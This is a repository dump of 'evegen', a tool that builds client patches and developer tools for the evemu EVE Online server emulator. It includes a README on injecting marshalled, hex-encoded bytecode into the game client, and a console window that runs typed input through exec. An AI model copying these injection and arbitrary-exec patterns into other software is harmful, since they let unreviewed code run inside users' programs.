try:\n # menu = dna.Ship().ImportFromShip(shipID=item.itemID, ownerID=item.ownerID, deferred=True).GetMenuInline(spiffy=False, fit=item.itemID != session.shipid)\n # gm.append(('Copycat', menu))\n # except RuntimeError:\n # pass\n gm += [('/Online modules', lambda shipID = item.itemID: self.SlashCmd('/online %d' % shipID))]\n gm += self.GetGMTypeMenu(item.typeID, itemID=item.itemID)\n if getattr(slimItem, 'categoryID', None) == const.categoryEntity or getattr(slimItem, 'groupID', None) == const.groupWreck:\n gm.append(('NPC Info', ('isDynamic', self.NPCInfoMenu, (item,))))\n gm.append(None)\n if session.role & service.ROLE_CONTENT:\n if slimItem:\n if getattr(slimItem, 'dunObjectID', None) != None:\n if not sm.StartService('scenario').IsSelected(itemID):\n gm.append(('Add to Selection', sm.StartService('scenario').AddSelected, (itemID,)))\n else:\n gm.append(('Remove from Selection', sm.StartService('scenario').RemoveSelected, (itemID,)))\n if slimItem:\n itemID = slimItem.itemID\n graphicID = cfg.invtypes.Get(slimItem.typeID).graphicID\n graphicFile = util.GraphicFile(graphicID)\n if graphicFile is '':\n graphicFile = None\n subMenu = self.GetGMStructureStateMenu(itemID, slimItem, charID, invItem, mapItem)\n if len(subMenu) > 0:\n gm += [('Change State', subMenu)]\n gm += self.GetGMBallsAndBoxesMenu(itemID, slimItem, charID, invItem, mapItem)\n gm.append(None)\n gm.append(('charID: ' + self.GetOwnerLabel(slimItem.charID), blue.pyos.SetClipboardData, (str(slimItem.charID),)))\n gm.append(('ownerID: ' + self.GetOwnerLabel(slimItem.ownerID), blue.pyos.SetClipboardData, (str(slimItem.ownerID),)))\n gm.append(('corpID: ' + self.GetOwnerLabel(slimItem.corpID), blue.pyos.SetClipboardData, (str(slimItem.corpID),)))\n gm.append(('allianceID: ' + self.GetOwnerLabel(slimItem.allianceID), blue.pyos.SetClipboardData, (str(slimItem.allianceID),)))\n gm.append(None)\n gm.append(('typeID: ' + str(slimItem.typeID) + ' (%s)' % cfg.invtypes.Get(slimItem.typeID).name, blue.pyos.SetClipboardData, (str(slimItem.typeID),)))\n gm.append(('groupID: ' + str(slimItem.groupID) + ' (%s)' % cfg.invgroups.Get(slimItem.groupID).name, blue.pyos.SetClipboardData, (str(slimItem.groupID),)))\n gm.append(('categID: ' + str(slimItem.categoryID) + ' (%s)' % cfg.invcategories.Get(slimItem.categoryID).name, blue.pyos.SetClipboardData, (str(slimItem.categoryID),)))\n gm.append(('graphicID: ' + str(graphicID), blue.pyos.SetClipboardData, (str(graphicID),)))\n gm.append(('graphicFile: ' + str(graphicFile), blue.pyos.SetClipboardData, (str(graphicFile),)))\n gm.append(None)\n gm.append(('Copy Coordinates', self.CopyCoordinates, (itemID,)))\n gm.append(None)\n try:\n state = slimItem.orbitalState\n if state in (entities.STATE_UNANCHORING,\n entities.STATE_ONLINING,\n entities.STATE_ANCHORING,\n entities.STATE_OPERATING,\n entities.STATE_OFFLINING,\n entities.STATE_SHIELD_REINFORCE):\n stateText = pos.DISPLAY_NAMES[pos.Entity2DB(state)]\n gm.append(('End orbital state change (%s)' % stateText, self.CompleteOrbitalStateChange, (itemID,)))\n elif state == entities.STATE_ANCHORED:\n upgradeType = sm.GetService('godma').GetTypeAttribute2(slimItem.typeID, const.attributeConstructionType)\n if upgradeType is not None:\n gm.append(('Upgrade to %s' % cfg.invtypes.Get(upgradeType).typeName, self.GMUpgradeOrbital, (itemID,)))\n gm.append(('GM: Take Control', self.TakeOrbitalOwnership, (itemID, slimItem.planetID)))\n except ValueError:\n pass\n gm.append(None)\n dict = {'CHARID': charID,\n 'ITEMID': itemID,\n 'ID': charID or itemID}\n for i in range(20):\n item = prefs.GetValue('gmmenuslash%d' % i, None)\n if item:\n for (k, v,) in dict.iteritems():\n if ' %s ' % k in item and v:\n item = item.replace(k, str(v))\n break\n else:\n continue\n gm.append((item, sm.RemoteSvc('slash').SlashCmd, (item,)))\n return gm\n"
},
{
"alpha_fraction": 0.6724137663841248,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 47.33333206176758,
"blob_id": "021c800a4fad8e50cfa620c00298521f31202425",
"content_id": "166c902ddeec977b26abc4e3b817f3345610bda9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 290,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 6,
"path": "/patches/news.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#@liveupdate(\"globalClassMethod\", \"form.CharSelection::CharSelection\", \"OpenNews\")\n#@patchinfo(\"OpenNews\", \"Changes the news url\")\ndef OpenNews(self, browser, *args):\n import uicls\n uicls.Fill(parent=browser, color=(0.2, 0.2, 0.2, 0.4))\n browser.GoTo(\"http://evenews.alasiya.net\")\n"
},
{
"alpha_fraction": 0.7442434430122375,
"alphanum_fraction": 0.7458881735801697,
"avg_line_length": 29.915254592895508,
"blob_id": "c17640fc771c73766e72d2c75b99c8eaab6ea839",
"content_id": "9369172a69b0bb9ab8e5f84bb5438fb126f11ecf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3648,
"license_type": "permissive",
"max_line_length": 181,
"num_lines": 118,
"path": "/README.md",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "# evegen\n\nUtility to generate liveupdates and devtools.raw for evemu.\n\n## Getting it\n\nCheck the [releases](https://github.com/THUNDERGROOVE/evegen/releases/)\n\n```\n./configure\n\nmake\n```\n\nI wouldn't recommend `make install` without a prefix.\n\n## argument info\n\nGenerate a devtools.raw file\n`./evegen -dev <devtools file>`\nThe argument is optional\n\nApply patches to the database\n`./evegen -patch <username> <password> <db>`\nAll arguments required\n\nDo a test run of the patches without writing to the database\n`./evegen -test` \n\n## patch files\n\nPatch files essentially overwrite specific functions in the EVE client.\n\nThe simplest example is the patch for disable the tutorials.\n\n```\n#@liveupdate(\"globalClassMethod\", svc.tutorial::TutorialSvc\", \"GetTutorials\")\n#@patchinfo(\"GetTutorials\", Disable tutorials whenever accessed. They cause issues\")\n\ndef GetTutorials(self):\n import __builtin__\n eve.Message(\"CustomNotify\", {\"notify\": \"Disabling tutorials\"})\n __builtin__.settings.Get(\"Char\").Set(\"ui\", \"showTutorials\", 0)\n eve.Message(\"CustomNotify\", {\"notify\": \"Tutorials disabled!\"})\n return {}\n```\n\nYou can see the decorator like annotations at the beginging of the file. They can exist anywhere in the file but it's good practice to leave them in the begining.\n\nThe first one is `liveupdate` it always has three arguments.\n\nThis portion is limited as it's been awhile since I've worked with patches.\n\n1. patch type.\n2. Where clause. \n3. Identifier of what you're patching\n\nGenerally, you can do anything with `globalClassMethod` patch type.\nThe where clause for that is going to be \n`<destination package>.<class name>::<instance name>`\n\nThe second annotation is `patchinfo`\n\nIt requires two arguments as follows\n\n1. Name of the function in the patch file you're using to patch the original\n2. Description\n\nThe description is only in the DB, and afaik isn't even sent to the client.\n\n## Devtools\n\nUnlike patches, devtools adds new code to the client. In some spots in the client, it expects certain code to exist in the client which normally doesn't if you have specific roles.\n\nThis can break various things if you're missing said code.\n\nA main devtools files expects a `Bootstrap` function that accepts two arguments.\n\n```\ndef Bootstrap(a, b):\n ...\n```\n\nInside, you can do pretty much anything you want. Any code in the Bootstrap function will run.\n\nThe only main requirement is that you set the `a.Loader` to a compiled function like so\n\n```\nscript = \"def hello():\\n\\tprint('Hello World')\"\ncode = compile(script, '<script>', 'exec')\ndata = marshal.dumps(code)\nexec marshal.loads(data) in None, None\na.Loader = hello\n```\n\nIf you don't do it this way, things get pretty fucky.\n\nAnything used in the Bootstrap function *MUST* be imported in the functions scope.\n\nAny instance of `'hexex::filename.py'` will replace the string with a hex encoded representation of the bytecode.\n\nYou can then create a new module with `imp` and dump the code straight into the modules `.__dict__` attribute.\n\nAfter that is done, you will want to add it to nasty's named object table so it will take into effect globally. This whole process looks something like this.\n\n```\nnewclass = \"hexex::newclass.py\"\ncode = marshal.loads(newclass.decode(\"hex\"))\nNewModule = imp.new_module(\"NewModule\")\nexec code in NewModule.__dict, None\nnast.nast.RegisterNamedObject(NewModule.NewClass, \"form\", \"NewClass\", \"devtools.py\", globals())\n```\n\n## Notes\n\nSometimes, due to the way scoping turns out, you can't use any imports already imported into the file or sometimes even builtins added by the client.\n\nGenerally, just import anything you need in your function.\n"
},
{
"alpha_fraction": 0.6181640625,
"alphanum_fraction": 0.638671875,
"avg_line_length": 30.96875,
"blob_id": "f016c2fbf988e3e5b640b9fd19ba1084c6f77055",
"content_id": "03f110c531386254ea0ebbd25bb5dfa6441a14a9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1024,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 32,
"path": "/devToolsConsole.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "import uicls\nimport uiconst\n\nclass ConsoleWindow(uicls.Window):\n __guid__ = \"form.Console\"\n default_windowID = \"Console\"\n default_width = 450\n default_height = 300\n default_topParentHeight = 0\n default_minSize = (default_width, default_height)\n\n\n\n def write(self, txt):\n import listentry\n self.sr.scroll.AddNode(-1, listentry.Get(\"Text\", {\"text\": txt, \"line\": 1}))\n\n def ApplyAttributes(self, attributes):\n import uicls\n import uiutil\n import uiconst\n import sys\n sys.stdout = self\n uicls.Window.ApplyAttributes(self, attributes)\n scroll = uicls.Scroll(parent=uiutil.GetChild(self, 'main'), padding=2)\n self.sr.scroll = scroll\n self.edit = uicls.SinglelineEdit(name=\"\", readonly=False, parent=self.sr.maincontainer, align=uiconst.RELATIVE, pos=(2, 2, 150, 25), padding=(0,0,0,0))\n self.edit.OnReturn = self.EnterPressed\n\n def EnterPressed(self, *args):\n val = self.edit.GetValue() \n exec(val + \"\\n\")\n\n"
},
{
"alpha_fraction": 0.5763729214668274,
"alphanum_fraction": 0.5873212218284607,
"avg_line_length": 35.584415435791016,
"blob_id": "d51bf386e71c87c13fa3bfb7ea3583a8f0ba8c92",
"content_id": "2a56c207ad9e0e779f2e11fc25718a0567c6e184",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5663,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 154,
"path": "/devToolsWindow.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "import uicls\nimport uiconst\n\n# sm.GetService(\"cmd\").commandMap.AddCommand(util.CommandMap(form.DevWindow.Show, (uiconst.VK_CONTROL, uiconst.VK_D)))\nclass DevWindow(uicls.Window):\n __guid__ = \"form.DevWindow\"\n default_windowID = \"DevWindow\"\n default_width = 450\n default_height = 300\n default_topParentHeight = 0\n default_minSize = (default_width, default_height)\n console_state = 0\n\n def ApplyAttributes(self, attributes):\n import uicls\n import uiconst\n uicls.Window.ApplyAttributes(self, attributes)\n uicls.Button(parent=self.sr.maincontainer, align=uiconst.TOLEFT, label=\"UIDebugger\", func=self.OpenUIDebugger)\n uicls.Button(parent=self.sr.maincontainer, align=uiconst.TOLEFT, label=\"Dungeon Editor\", func=self.OpenDungeonEditor)\n uicls.Button(parent=self.sr.maincontainer, align=uiconst.TOLEFT, label=\"Paint Direction Vectors\", func=self.StartPaintingDirectionVectors)\n\n #uicls.Button(self.sr.maincontainer, align=uiconst.TOLEFT, label=\"Camera Settings\", func=self.OpenCameraSettings)\n uicls.Button(parent=self.sr.maincontainer, align=uiconst.TOLEFT, label=\"Start RC\", func=self.ToggleRemoteConsole)\n\n def OpenUIDebugger(self, a):\n import form\n form.UIDebugger.Open()\n\n def OpenDungeonEditor(self, a):\n import form\n form.DungeonEditor.Open()\n\n def OpenCameraSettings(self, a):\n import cameras\n cameras.DebugChangeCameraSettingsWindow.Open()\n def StartPaintingDirectionVectors(self, a):\n from log import LogError\n import uix\n\timport uiutil\n\timport mathUtil\n\timport xtriui\n\timport uthread\n\timport form\n\timport blue\n\timport util\n\timport spaceObject\n\timport trinity\n\timport service\n\timport destiny\n\timport listentry\n\timport base\n\timport math\n\timport sys\n\timport geo2\n\timport maputils\n\timport copy\n\tfrom math import pi, cos, sin, sqrt, floor\n\tfrom foo import Vector3\n\tfrom mapcommon import SYSTEMMAP_SCALE\n\tfrom traceback import format_exception\n\timport functools\n\timport uiconst\n\timport uicls\n\timport listentry\n\timport state\n\timport localization\n\timport localizationUtil\n\t\n\tdef safetycheck(func):\n def wrapper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except:\n try:\n print \"exception in \" + func.__name__\n (exc, e, tb,) = sys.exc_info()\n result2 = (''.join(format_exception(exc, e, tb)) + '\\n').replace('\\n', '<br>')\n #sm.GetService('gameui').MessageBox(result2, \"ProbeHelper Exception\")\n sm.GetService('FxSequencer').LogError(result2)\n except:\n print \"exception in safetycheck\"\n return wrapper\n\n\t@safetycheck\n\tdef WarpToStuff(ItemID):\n sm.services[\"michelle\"].GetRemotePark().CmdWarpToStuff(\"item\", ItemID, 50000)\t\n\t\t\n\t@safetycheck\n\tdef GetBallPark():\n bp = sm.GetService('michelle').GetBallpark()\n while(not bp):\n blue.pyos.synchro.Sleep(5000)\n bp = sm.GetService('michelle').GetBallpark()\n return bp\t\n\n\t@safetycheck\n\tdef LogMessage(Message_Text):\n\t\tsm.GetService('gameui').Say(Message_Text)\n\t\n\t@safetycheck\n\tdef ShowAllPaths():\n bp = GetBallPark()\n myball = bp.GetBall(eve.session.shipid)\t\n if not myball:\n LogMessage(\"ball doesnt exist\")\n return\n if bp:\n balls = copy.copy(bp.balls)\n LogMessage(\"Copied Ballpark\")\n else:\n LogMessage(\"Invalid Ballpark\")\n \n \n tacticalSvc = sm.GetService(\"tactical\")\n tacticalSvc.circles.ClearLines()\n color = (0.25,0.25,0.25,1)\n \n i = 0\n for qq in range(500):\n blue.pyos.synchro.Sleep(500)\n tacticalSvc.circles.ClearLines()\n for ballid in balls.iterkeys():\n ball = bp.GetBall(ballid)\n slimItem = bp.GetInvItem(ballid) \n if (ball.maxVelocity != 0):\n currentDirection = ball.GetQuaternionAt(blue.os.GetTime())\n d = trinity.TriVector(0,0,1)\n d.TransformQuaternion(currentDirection)\n #LogMessage(str(d.x) + \" \" + str(d.y) + \" \" + str(d.z))\n d.x = d.x*10000\n d.y = d.y*10000\n d.z = d.z*10000\n LogMessage(str(d.x) + \" \" + str(d.y) + \" \" + str(d.z))\n RelPosBallX = (ball.x-myball.x)\n RelPosBallY = (ball.y-myball.y)\n RelPosBallZ = (ball.z-myball.z)\n\t\t\t\t\t\n tacticalSvc.circles.AddLine((RelPosBallX,RelPosBallY,RelPosBallZ),color,(RelPosBallX+d.x,RelPosBallY+d.y,RelPosBallZ+d.z),color)\n tacticalSvc.circles.SubmitChanges()\n\t\ti=i+1\n try:\n uthread.new(ShowAllPaths)\n\texcept:\n\t\tLogMessage(\"error\")\n\n def ToggleRemoteConsole(self, a):\n import uicls\n import uiconst\n\n self.sr.maincontainer.children.remove(self.sr.maincontainer.children[9]) # TODO: Nick: Fix this hardcoded garbage if possible\n if self.console_state == 0:\n uicls.Button(parent=self.sr.maincontainer, align=uiconst.TOLEFT, label=\"RC Running..\", func=self.ToggleRemoteConsole)\n self.console_state = 1\n sm.GetService(\"insider\").start_remote_console()\n \n \n\n\n\n"
},
{
"alpha_fraction": 0.7228195667266846,
"alphanum_fraction": 0.7228195667266846,
"avg_line_length": 54.79999923706055,
"blob_id": "83e3a1c39310ee30dbab3a2f2bdd86c402802496",
"content_id": "bfad396f80aa2cbcb035a75d34b6e4689520e19a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 837,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 15,
"path": "/patches/EVEMuPhotoUpload.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#@liveupdate(\"globalClassMethod\", \"uicls.CharacterCreationLayer::CharacterCreationLayer\", \"AskForPortraitConfirmation\")\n#@patchinfo(\"AskForPortraitConfirmation\", \"Patch to fix photo uploads on char creation\")\ndef AskForPortraitConfirmation(self, *args):\n photo = self.GetActivePortrait()\n snapPath = self.GetPortraitSnapshotPath(self.activePortraitIndex)\n photoFile = open(snapPath, \"rb\")\n photoData = photoFile.read()\n photoFile.close()\n eve.Message('CustomNotify', {'notify': 'Uploading your character portrait to EVEMu'})\n result = sm.RemoteSvc(\"photoUploadSvc\").Upload(photoData)\n if ((result is None) or (result == False)):\n eve.Message('CustomNotify', {'notify': 'Portrait upload failed!'})\n else:\n eve.Message('CustomNotify', {'notify': 'Portrait upload successful!'})\n return True\n"
},
{
"alpha_fraction": 0.6962617039680481,
"alphanum_fraction": 0.6985981464385986,
"avg_line_length": 52.5,
"blob_id": "55232c841fd92111718d9275cd23189591a98be3",
"content_id": "19c550135d3f9575bb5f9b542e6cfc535164bd3b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 428,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 8,
"path": "/patches/EVEMuDisableTutorial.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#@liveupdate(\"globalClassMethod\", \"svc.tutorial::TutorialSvc\", \"GetTutorials\")\n#@patchinfo(\"GetTutorials\", \"Disable tutorials whenever accessed. They cause issues\")\ndef GetTutorials(self):\n import __builtin__\n eve.Message(\"CustomNotify\", {\"notify\": \"Disabling tutorials\"})\n __builtin__.settings.Get(\"char\").Set(\"ui\", \"showTutorials\", 0)\n eve.Message(\"CustomNotify\", {\"notify\": \"Tutorials disabled!\"})\n return {}\n"
},
{
"alpha_fraction": 0.5893508195877075,
"alphanum_fraction": 0.6039387583732605,
"avg_line_length": 20.421875,
"blob_id": "a104005634bcb6ad6bfc98c0d19d6673c1119fee",
"content_id": "44e21d13d97b5f68624ea46cd07d6c176a61bdf0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1371,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 64,
"path": "/src/patch.h",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#ifndef __PATCH_H__\n#define __PATCH_H__\n\n#include <Python.h>\n\n#include <vector>\n#include <uchar.h>\n\n#define LIVEUPDATEMAGIC \"$lu1\"\n\n// Structure for passing patch info between calls\nstruct Patch {\n uint32_t class_name_size;\n uint32_t method_name_size;\n uint32_t func_name_size;\n uint32_t type_size;\n uint32_t name_size;\n uint32_t desc_size;\n uint32_t bytecode_size;\n\n char *class_name;\n char *method_name;\n char *func_name;\n char *type;\n char *name;\n char *desc;\n char *data;\n char *bytecode;\n};\n\nstruct PatchFile {\n char magic[4];\n uint32_t patch_count;\n Patch *patches;\n};\n\n// LoadPatches will load all patches from a given directory\nstd::vector<Patch *> LoadPatches(const char *patch_dir);\n\nenum PatchError_ {\n __patch_null,\n patch_ok,\n patch_invalid_magic,\n patch_file_too_small,\n patch_file_error,\n};\n\nstruct PatchError {\n uint32_t line;\n PatchError_ err;\n};\n\n#define MAKE_PATCH_ERROR(__error) { \\\n PatchError e; \\\n e.line = __LINE__; \\\n e.err = __error; \\\n return e; \\\n }\n\nconst char *PatchErrorString(PatchError p);\nPatchError DumpRawPatchFile(std::vector<Patch *> patches, const char *filename);\nPatchError LoadRawPatchFile(PatchFile *pf, const char *filename);\n\n#endif\n"
},
{
"alpha_fraction": 0.7696374654769897,
"alphanum_fraction": 0.7711480259895325,
"avg_line_length": 43.150001525878906,
"blob_id": "a96e3fd3f3e4313a6fd644bb7fcc2cd7891b39a4",
"content_id": "f8607218cd5da76a1708c94e5be0ef5aaf2db484",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 2648,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 60,
"path": "/cmake/FindMariaDBClient.cmake",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "# MIT License\n#\n# Copyright (c) 2018 The ViaDuck Project\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\n# - Try to find MariaDB client library. This matches both the \"old\" client library and the new C connector.\n# Once found this will define\n# MariaDBClient_FOUND - System has MariaDB client library\n# MariaDBClient_INCLUDE_DIRS - The MariaDB client library include directories\n# MariaDBClient_LIBRARIES - The MariaDB client library\n\n# includes\nfind_path(MariaDBClient_INCLUDE_DIR\n NAMES mysql.h\n PATH_SUFFIXES mariadb mysql\n )\n\n# library\nset(BAK_CMAKE_FIND_LIBRARY_SUFFIXES ${CMAKE_FIND_LIBRARY_SUFFIXES})\nset(CMAKE_FIND_LIBRARY_SUFFIXES ${CMAKE_SHARED_LIBRARY_SUFFIX})\nfind_library(MariaDBClient_LIBRARY\n NAMES mariadb libmariadb mariadbclient libmariadbclient mysqlclient libmysqlclient\n PATH_SUFFIXES mariadb mysql\n )\nset(CMAKE_FIND_LIBRARY_SUFFIXES ${BAK_CMAKE_FIND_LIBRARY_SUFFIXES})\n\ninclude(FindPackageHandleStandardArgs)\nfind_package_handle_standard_args(MariaDBClient DEFAULT_MSG MariaDBClient_LIBRARY MariaDBClient_INCLUDE_DIR)\n\nif(MariaDBClient_FOUND)\n if(NOT TARGET MariaDBClient::MariaDBClient)\n add_library(MariaDBClient::MariaDBClient UNKNOWN IMPORTED)\n set_target_properties(MariaDBClient::MariaDBClient PROPERTIES\n INTERFACE_INCLUDE_DIRECTORIES \"${MariaDBClient_INCLUDE_DIR}\"\n IMPORTED_LOCATION \"${MariaDBClient_LIBRARY}\")\n endif()\nendif()\n\nmark_as_advanced(MariaDBClient_INCLUDE_DIR MariaDBClient_LIBRARY)\n\nset(MariaDBClient_LIBRARIES ${MariaDBClient_LIBRARY})\nset(MariaDBClient_INCLUDE_DIRS ${MariaDBClient_INCLUDE_DIR})"
},
{
"alpha_fraction": 0.699999988079071,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 19,
"blob_id": "49788c55028c64910732d19957f9d5d364e5013b",
"content_id": "acdce5c0182d9e89ed3f1d55a5e794b7bd11d0a2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 200,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 10,
"path": "/src/db.h",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#ifndef __DB_H__\n#define __DB_H__\n\n#include \"patch.h\"\n\nbool DBInit(const char *username, const char *password, const char *db);\nbool DBApplyPatch(Patch *p, int id);\nbool DBCleanLiveupdates();\n\n#endif\n"
},
{
"alpha_fraction": 0.45818954706192017,
"alphanum_fraction": 0.46615344285964966,
"avg_line_length": 28.66141700744629,
"blob_id": "85e18a37d6f6c7c834b4baafc4741d25252a7db3",
"content_id": "2976760bfa8ee1af084f1c66a3367f33ac91de04",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3767,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 127,
"path": "/src/main.cpp",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#include <Python.h>\n#include <stdbool.h>\n#include <stdio.h>\n#include <string.h>\n\n#include \"patch.h\"\n#include \"devtools.h\"\n//#include \"config.h\"\n#define PACKAGE \"evegen\"\n#define PACKAGE_VERSION \"1.0\"\n#include \"db.h\"\n\nbool do_devtools = false;\nbool do_patch = false;\nbool do_test = false;\nbool do_raw = false;\n\nchar *username = NULL;\nchar *password = NULL;\nchar *db = NULL;\nchar *devtools_in = NULL;\n\nstatic void print_help() {\n printf(\"%s - %s\\n\", PACKAGE, PACKAGE_VERSION);\n printf(\" -dev : outputs devtools.raw\\n\");\n printf(\" : optionally supply <devtools file>\\n\");\n printf(\" -patch: applies patches instead of doing a dry run\\n\");\n printf(\" : supply <username> <password> <db>\\n\");\n}\n\nint main(int argc, char **argv) {\n if (argc == 1) {\n print_help();\n return 0;\n }\n for (int i = 0; i < argc; i++) {\n if (strcmp(argv[i], \"-dev\") == 0) {\n if (argc > i + 1) {\n char *devtools_name = argv[i + 1];\n if (*devtools_name != '-') {\n devtools_in = argv[i + 1];\n }\n }\n do_devtools = true;\n }\n if (strcmp(argv[i], \"-test\") == 0) {\n do_test = true;\n }\n if (strcmp(argv[i], \"-patch\") == 0) {\n if (argc < i + 3) {\n printf(\"-patch expects <username> <password> <db>\\n\");\n return 0;\n } else {\n username = argv[i + 1];\n password = argv[i + 2];\n db = argv[i + 3];\n }\n do_patch = true;\n }\n if (strcmp(argv[i], \"-raw\") == 0) {\n do_raw = true;\n }\n if (strcmp(argv[i], \"--help\") == 0 ||\n strcmp(argv[i], \"-h\") == 0) {\n print_help();\n return 0;\n }\n }\n\n Py_Initialize();\n if (do_test) {\n std::vector<Patch *> patches = LoadPatches(\"patches\");\n PatchFile pf;\n \n PatchError err = LoadRawPatchFile(&pf, \"updates.lu\");\n if (err.err != patch_ok) {\n printf(\"ERROR :%s\\n\", PatchErrorString(err));\n printf(\"%d\\n\", err.line);\n return 0;\n }\n for (uint32_t i = 0; i < pf.patch_count; i++) {\n printf(\"===================\\n\");\n Patch *p = &pf.patches[i];\n printf(\"class: %s\\n\", p->class_name);\n printf(\"method: %s\\n\", p->method_name);\n printf(\"func: %s\\n\", p->func_name);\n printf(\"type: %s\\n\", p->type);\n printf(\"name: %s\\n\", p->name);\n printf(\"desc: %s\\n\", p->desc);\n printf(\"bytecode size: %u\\n\", p->bytecode_size);\n }\n }\n\n if (do_patch) {\n std::vector<Patch *> patches = LoadPatches(\"patches\");\n printf(\" OK | Loaded %lu patches\\n\", patches.size());\n DBInit(username, password, db);\n DBCleanLiveupdates();\n printf(\" > Applying patches\\n\");\n for (uint32_t i = 0; i < patches.size(); i++) {\n Patch *p = patches[i];\n printf(\" %d/%lu: %s\\n\", i + 1, patches.size(), p->name);\n DBApplyPatch(p, i);\n }\n }\n\n if (do_raw) {\n std::vector<Patch *> patches = LoadPatches(\"patches\");\n PatchError err = DumpRawPatchFile(patches, \"updates.lu\");\n if (err.err != patch_ok) {\n printf(\"Error dumping patch file: %s\\n\", PatchErrorString(err));\n printf(\"At line %u\\n\", err.line);\n return -1;\n }\n printf(\" OK | Dumped %lu types to updates.lu\\n\", patches.size());\n }\n\n if (do_devtools) {\n if (devtools_in != NULL) {\n MakeDevtools(devtools_in);\n } else {\n MakeDevtools(\"devtools.py\");\n }\n }\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6123127937316895,
"alphanum_fraction": 0.6139767169952393,
"avg_line_length": 25.711111068725586,
"blob_id": "c8eeef1abb5af4b3b6824bd3b49f4213cbf38984",
"content_id": "07c5eca2d21f7e3709c276fc2a08deddef893b16",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1202,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 45,
"path": "/src/devtools.cpp",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#include \"devtools.h\"\n\n#include <stdio.h>\n\n#include \"makedevtools.def\"\n\n// WIP may never finish\nbool MakeDevtoolsNoScript(const char *devtools_file) {\n /*\n //PyObject *main = PyImport_AddModule(\"__main__\");\n \n PyObject *globals = PyDict_New();\n PyObject *locals = PyDict_New();\n FILE *f = fopen(devtools_file, \"r\");\n if (f == NULL) {\n printf(\" ERROR | Couldn't find devtools file\\n\");\n return false;\n }\n\n PyRun_FileExFlags(f, devtools_file, Py_file_input,\n globals, locals, true, NULL);\n\n\n PyObject *bootstrap = PyDict_GetItemString(locals, \"Bootstrap\");\n PyObject *func_code = PyObject_GetAttrString(bootstrap, \"func_code\");\n PyObject *co_consts_tuple = PyObject_GetAttrString(func_code, \"co_consts\");\n\n Py_ssize_t size = PyTuple_Size(co_consts_tuple);\n size = 0;\n //PyObject *co_consts = PyList_New(size);\n */\n\n return true;\n}\n\nbool MakeDevtools(const char *devtools_file) {\n int ret = PyRun_SimpleString(devtools_script);\n if (ret == 0) {\n printf(\" OK | Wrote devtools.raw\\n\");\n return true;\n } else {\n printf(\" ERROR | Couldn't write devtools.raw\\n\");\n return false;\n }\n}\n"
},
{
"alpha_fraction": 0.71517413854599,
"alphanum_fraction": 0.7238805890083313,
"avg_line_length": 27.714284896850586,
"blob_id": "e066be3b9ae150be7138ee7dca8ee9c07fb9dd10",
"content_id": "b0010240673895ef474aaff616ef3905ab00e66b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 804,
"license_type": "permissive",
"max_line_length": 94,
